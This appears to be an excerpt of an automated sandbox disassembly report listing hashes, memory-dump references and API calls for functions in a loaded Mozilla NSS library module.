                                                                                • Instruction ID: e20e5970011961768c8851c29e0e11234243d48c0f38dad94c8c8c119c104fd0
                                                                                • Opcode Fuzzy Hash: 34fd74b342732f57fd8306da4b1f0ca226c00ddc9132be3d96078dba139b7e29
                                                                                • Instruction Fuzzy Hash: 8AA105B17041018BEB08EFA1FF8976E3B79BB47718F08802CD81687A46DF759A41CB52
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DE1B
                                                                                • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6D05DE77
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                • String ID:
                                                                                • API String ID: 2700453212-0
                                                                                • Opcode ID: 2e429a75cf8d4a43151271d9ce2ec7afd521f48a4ea564951429ac543f47eee6
                                                                                • Instruction ID: 44d646b0ebdeafdd2897c6d9dcfdea613ec0a4451d63e09f8885a08f543b0692
                                                                                • Opcode Fuzzy Hash: 2e429a75cf8d4a43151271d9ce2ec7afd521f48a4ea564951429ac543f47eee6
                                                                                • Instruction Fuzzy Hash: F5715475A00319CBEB10DF9AC68079AB7F5BF89714F15806ECD596B302DB70A961CFA0
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6CFAEDFD
                                                                                • calloc.MOZGLUE(00000001,00000000), ref: 6CFAEE64
                                                                                • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CFAEECC
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFAEEEB
                                                                                • free.MOZGLUE(?), ref: 6CFAEEF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorValuecallocfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 3833505462-0
                                                                                • Opcode ID: 3e82d346d7a8d3115018e6399f858aa489478804a3798385b295edbd893f1a12
                                                                                • Instruction ID: d671ac4e7454766685f24ca09acf1f20c61bb1989eb8b548b44b4b71ce2e5d79
                                                                                • Opcode Fuzzy Hash: 3e82d346d7a8d3115018e6399f858aa489478804a3798385b295edbd893f1a12
                                                                                • Instruction Fuzzy Hash: AF312871500201DBE7209FA8DC817A7BBF4FB46314F160628E95A87A50EB71E835CBE1
                                                                                APIs
                                                                                • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CFB1E0B
                                                                                • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CFB1E24
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFB1E3B
                                                                                • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CFB1E8A
                                                                                • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CFB1EAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Choice_DecodeTimeUtil
                                                                                • String ID:
                                                                                • API String ID: 1529734605-0
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(00000000,?,6CFB3FFF,00000000,?,?,?,?,?,6CFB1A1C,00000000,00000000), ref: 6CFBADA7
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CFB3FFF,00000000,?,?,?,?,?,6CFB1A1C,00000000,00000000), ref: 6CFBADB4
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,6CFB3FFF,?,?,?,?,6CFB3FFF,00000000,?,?,?,?,?,6CFB1A1C,00000000), ref: 6CFBADD5
                                                                                  • Part of subcall function 6D00FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D008D2D,?,00000000,?), ref: 6D00FB85
                                                                                  • Part of subcall function 6D00FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D00FBB1
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D0D94B0,?,?,?,?,?,?,?,?,6CFB3FFF,00000000,?), ref: 6CFBADEC
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFB3FFF), ref: 6CFBAE3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2372449006-0
                                                                                APIs
                                                                                  • Part of subcall function 6CFF1E10: TlsGetValue.KERNEL32 ref: 6CFF1E36
                                                                                  • Part of subcall function 6CFF1E10: EnterCriticalSection.KERNEL32(?,?,?,6CFCB1EE,2404110F,?,?), ref: 6CFF1E4B
                                                                                  • Part of subcall function 6CFF1E10: PR_Unlock.NSS3 ref: 6CFF1E76
                                                                                • free.MOZGLUE(?,6CFDD079,00000000,00000001), ref: 6CFDCDA5
                                                                                • PK11_FreeSymKey.NSS3(?,6CFDD079,00000000,00000001), ref: 6CFDCDB6
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CFDD079,00000000,00000001), ref: 6CFDCDCF
                                                                                • DeleteCriticalSection.KERNEL32(?,6CFDD079,00000000,00000001), ref: 6CFDCDE2
                                                                                • free.MOZGLUE(?), ref: 6CFDCDE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                • String ID:
                                                                                • API String ID: 1720798025-0
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6D0138A2), ref: 6D013DB0
                                                                                • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6D0138A2), ref: 6D013DBF
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6D0138A2), ref: 6D013DD9
                                                                                • _wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6D0138A2), ref: 6D013DE7
                                                                                • free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6D0138A2), ref: 6D013DF8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
                                                                                • String ID:
                                                                                • API String ID: 1642359729-0
                                                                                APIs
                                                                                  • Part of subcall function 6D045B40: PR_GetIdentitiesLayer.NSS3 ref: 6D045B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D042D9C
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D042DB2
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D042DCF
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D042DF2
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D042E0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                • String ID:
                                                                                • API String ID: 1593528140-0
                                                                                APIs
                                                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBDC3
                                                                                • free.MOZGLUE(?,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBDCA
                                                                                • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBDE9
                                                                                • free.MOZGLUE(?,00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBE21
                                                                                • free.MOZGLUE(00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBE32
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                • String ID:
                                                                                • API String ID: 3662805584-0
                                                                                APIs
                                                                                • PR_Free.NSS3(?), ref: 6D0C7C73
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0C7C83
                                                                                • malloc.MOZGLUE(00000001), ref: 6D0C7C8D
                                                                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D0C7C9F
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C7CAD
                                                                                  • Part of subcall function 6D079BF0: TlsGetValue.KERNEL32(?,?,?,6D0C0A75), ref: 6D079C07
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 105370314-0
                                                                                APIs
                                                                                • DeleteCriticalSection.KERNEL32(6D0CA6D8), ref: 6D0CAE0D
                                                                                • free.MOZGLUE(?), ref: 6D0CAE14
                                                                                • DeleteCriticalSection.KERNEL32(6D0CA6D8), ref: 6D0CAE36
                                                                                • free.MOZGLUE(?), ref: 6D0CAE3D
                                                                                • free.MOZGLUE(00000000,00000000,?,?,6D0CA6D8), ref: 6D0CAE47
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalDeleteSection
                                                                                • String ID:
                                                                                • API String ID: 682657753-0
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF57D35
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmp
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 632333372-598938438
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CF46D36
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF46D20
                                                                                • database corruption, xrefs: 6CF46D2A
                                                                                • %s at line %d of [%.10s], xrefs: 6CF46D2F
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 632333372-598938438
                                                                                APIs
                                                                                  • Part of subcall function 6D07CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D07CC7B), ref: 6D07CD7A
                                                                                  • Part of subcall function 6D07CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D07CD8E
                                                                                  • Part of subcall function 6D07CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D07CDA5
                                                                                  • Part of subcall function 6D07CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D07CDB8
                                                                                • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6D07CCB5
                                                                                • memcpy.VCRUNTIME140(6D1114F4,6D1102AC,00000090), ref: 6D07CCD3
                                                                                • memcpy.VCRUNTIME140(6D111588,6D1102AC,00000090), ref: 6D07CD2B
                                                                                  • Part of subcall function 6CF99AC0: socket.WSOCK32(?,00000017,6CF999BE), ref: 6CF99AE6
                                                                                  • Part of subcall function 6CF99AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CF999BE), ref: 6CF99AFC
                                                                                  • Part of subcall function 6CFA0590: closesocket.WSOCK32(6CF99A8F,?,?,6CF99A8F,00000000), ref: 6CFA0597
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                • String ID: Ipv6_to_Ipv4 layer
                                                                                • API String ID: 1231378898-412307543
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_Initialize), ref: 6CFE1CD8
                                                                                • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CFE1CF1
                                                                                  • Part of subcall function 6D0C09D0: PR_Now.NSS3 ref: 6D0C0A22
                                                                                  • Part of subcall function 6D0C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D0C0A35
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D0C0A66
                                                                                  • Part of subcall function 6D0C09D0: PR_GetCurrentThread.NSS3 ref: 6D0C0A70
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D0C0A9D
                                                                                  • Part of subcall function 6D0C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D0C0AC8
                                                                                  • Part of subcall function 6D0C09D0: PR_vsmprintf.NSS3(?,?), ref: 6D0C0AE8
                                                                                  • Part of subcall function 6D0C09D0: EnterCriticalSection.KERNEL32(?), ref: 6D0C0B19
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D0C0B48
                                                                                  • Part of subcall function 6D0C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D0C0C76
                                                                                  • Part of subcall function 6D0C09D0: PR_LogFlush.NSS3 ref: 6D0C0C7E
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                • API String ID: 1907330108-3943720641
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6D021D8F
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D021DA6
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D021E13
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D021ED0
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                • String ID:
                                                                                • API String ID: 84796498-0
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFD074,00000000), ref: 6D03AD13
                                                                                • memcmp.VCRUNTIME140(?,?,?), ref: 6D03AD65
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D03AD95
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D03ADC8
                                                                                Similarity
                                                                                • API ID: Item_Util$CopyErrorZfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 2638228310-0
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,-0000002C,?,6D02127F,?), ref: 6D023D89
                                                                                  • Part of subcall function 6D0206F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6D022E70,00000000), ref: 6D020701
                                                                                • SECOID_FindOID_Util.NSS3(FFFFFFFF,?), ref: 6D023DD3
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CFB8298,?,?,?,6CFAFCE5,?), ref: 6D0107BF
                                                                                  • Part of subcall function 6D0107B0: PL_HashTableLookup.NSS3(?,?), ref: 6D0107E6
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D01081B
                                                                                  • Part of subcall function 6D0107B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D010825
                                                                                Similarity
                                                                                • API ID: Error$HashLookupTableUtil$Alloc_ConstFind
                                                                                • String ID:
                                                                                • API String ID: 99596740-0
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D087E10
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D087EA6
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D087EB5
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D087ED8
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong
                                                                                • String ID:
                                                                                • API String ID: 4101233201-0
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE002,00000000,?,6D021289,?), ref: 6D022D72
                                                                                  • Part of subcall function 6D023390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6D022CA7,E80C76FF,?,6D021289,?), ref: 6D0233E9
                                                                                  • Part of subcall function 6D023390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6D02342E
                                                                                • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D021289,?), ref: 6D022D61
                                                                                  • Part of subcall function 6D020B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D020B21
